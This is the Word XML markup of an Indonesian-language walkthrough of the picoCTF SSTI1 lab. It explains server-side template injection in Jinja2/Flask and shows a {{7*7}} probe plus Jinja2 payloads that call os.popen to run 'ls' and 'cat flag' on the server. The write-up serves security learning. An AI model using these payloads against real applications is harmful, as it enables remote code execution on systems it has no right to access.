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line="19" w:lineRule="atLeast"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="sans-serif" w:hAnsi="sans-serif" w:eastAsia="sans-serif" w:cs="sans-serif"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="1D253B"/>
          <w:spacing w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="sans-serif" w:hAnsi="sans-serif" w:eastAsia="sans-serif" w:cs="sans-serif"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="1D253B"/>
          <w:spacing w:val="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>SSTI1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ascii="Ubuntu" w:hAnsi="Ubuntu" w:eastAsia="Ubuntu" w:cs="Ubuntu"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pP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Lab </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="4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SSTI1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dari picoCTF termasuk ke dalam kerentanan </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="4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Server-Side Template Injection (SSTI)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Ubuntu" w:hAnsi="Ubuntu" w:eastAsia="Ubuntu" w:cs="Ubuntu"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pP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Ini adalah jenis serangan </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="4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injeksi kode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di mana penyerang menyisipkan ekspresi template ke dalam input yang diproses oleh template engine di server (dalam kasus ini, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="4"/>
          <w:rFonts w:hint="default" w:ascii="Ubuntu" w:hAnsi="Ubuntu" w:eastAsia="Ubuntu" w:cs="Ubuntu"/>
          <w:b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Jinja2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Ubuntu" w:hAnsi="Ubuntu" w:eastAsia="Ubuntu" w:cs="Ubuntu"/>
          <w:i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pada Flask), sehingga dapat mengeksekusi kode sewenang-wenang di server.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Tujuan dari lab picoCTF SSTI1 adalah untuk mengajarkan peserta tentang cara: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Mengidentifikasi kerentanan Server-Side Template Injection (SSTI) pada aplikasi web yang menggunakan template engine Jinja2 (Flask)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Mengeksploitasi kerentanan SSTI untuk mendapatkan Remote Code Execution (RCE) di server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Membaca file flag yang tersembunyi di sistem server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Langkah langkah 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Akses lab </w:t>
      </w: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1" name="Picture 1" descr="Screenshot_20251108_200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_20251108_2006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Lalu buka lab nya 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2" name="Picture 2" descr="Screenshot_20251108_200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_20251108_2007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Nimbus Roman" w:hAnsi="Nimbus Roman" w:cs="Nimbus Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Lalu selanjut nya cek kerentanan dengan memasukan payload </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu" w:hAnsi="Ubuntu" w:eastAsia="Ubuntu" w:cs="Ubuntu"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:spacing w:val="8"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>{{7*7}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu" w:hAnsi="Ubuntu" w:eastAsia="Ubuntu" w:cs="Ubuntu"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:spacing w:val="8"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>}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Jika server mengmbalikan 49 maka terindikasi kerentanan server side template injection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3" name="Picture 3" descr="Screenshot_20251108_20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_20251108_2010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Dan ternyata lab tersebut terindikasi server side template injection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4" name="Picture 4" descr="Screenshot_20251108_20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_20251108_2011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Nimbus Roman" w:hAnsi="Nimbus Roman" w:cs="Nimbus Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Lalu selanjutnya masukan payload </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu" w:hAnsi="Ubuntu" w:eastAsia="Ubuntu" w:cs="Ubuntu"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:spacing w:val="8"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>{{ request.application.__globals__.__builtins__.__import__('os').popen('ls').read() }}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5" name="Picture 5" descr="Screenshot_20251108_201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_20251108_2012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Dan hasil nya di dapatkan flag nya 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6" name="Picture 6" descr="Screenshot_20251108_201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_20251108_2014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 xml:space="preserve">Lalu masukan payload flag tersebut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Ubuntu" w:hAnsi="Ubuntu" w:eastAsia="Ubuntu" w:cs="Ubuntu"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:spacing w:val="8"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>{{ request.application.__globals__.__builtins__.__import__('os').popen('cat flag').read() }}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7" name="Picture 7" descr="Screenshot_20251108_20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_20251108_2015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Dan hasil nya flag ctf muncul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8" name="Picture 8" descr="Screenshot_20251108_20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_20251108_2015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t>Lalu copy dan submit flag tersebut dan lab tersolved</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Nimbus Roman" w:hAnsi="Nimbus Roman" w:cs="Nimbus Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Nimbus Roman" w:hAnsi="Nimbus Roman" w:cs="Nimbus Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5266055" cy="2841625"/>
            <wp:effectExtent l="0" t="0" r="10795" b="15875"/>
            <wp:docPr id="9" name="Picture 9" descr="Screenshot_20251108_201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_20251108_2016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Monospac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erif CJK H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Monospac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Noto Serif CJK H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Times New Roman"/>
    <w:panose1 w:val="020B0609030804020204"/>
    <w:charset w:val="00"/>
    <w:family w:val="auto"/>
    <w:pitch w:val="default"/>
    <w:sig w:usb0="00000000" w:usb1="00000000" w:usb2="00000000" w:usb3="00000000" w:csb0="001D016D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erif CJK HK">
    <w:panose1 w:val="02020500000000000000"/>
    <w:charset w:val="88"/>
    <w:family w:val="auto"/>
    <w:pitch w:val="default"/>
    <w:sig w:usb0="30000083" w:usb1="2BDF3C10" w:usb2="00000016" w:usb3="00000000" w:csb0="603A0107" w:csb1="00000000"/>
  </w:font>
  <w:font w:name="sans-serif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Noto Serif CJK HK">
    <w:panose1 w:val="02020500000000000000"/>
    <w:charset w:val="86"/>
    <w:family w:val="auto"/>
    <w:pitch w:val="default"/>
    <w:sig w:usb0="30000083" w:usb1="2BDF3C10" w:usb2="00000016" w:usb3="00000000" w:csb0="603A0107" w:csb1="0000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F7EC7"/>
    <w:rsid w:val="2EFF7EC7"/>
    <w:rsid w:val="3CEF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2025-11-08T19:48:00Z</dcterms:created>
  <dc:creator>exynous</dc:creator>
  <cp:lastModifiedBy>exynous</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-11-08T20:17:27Z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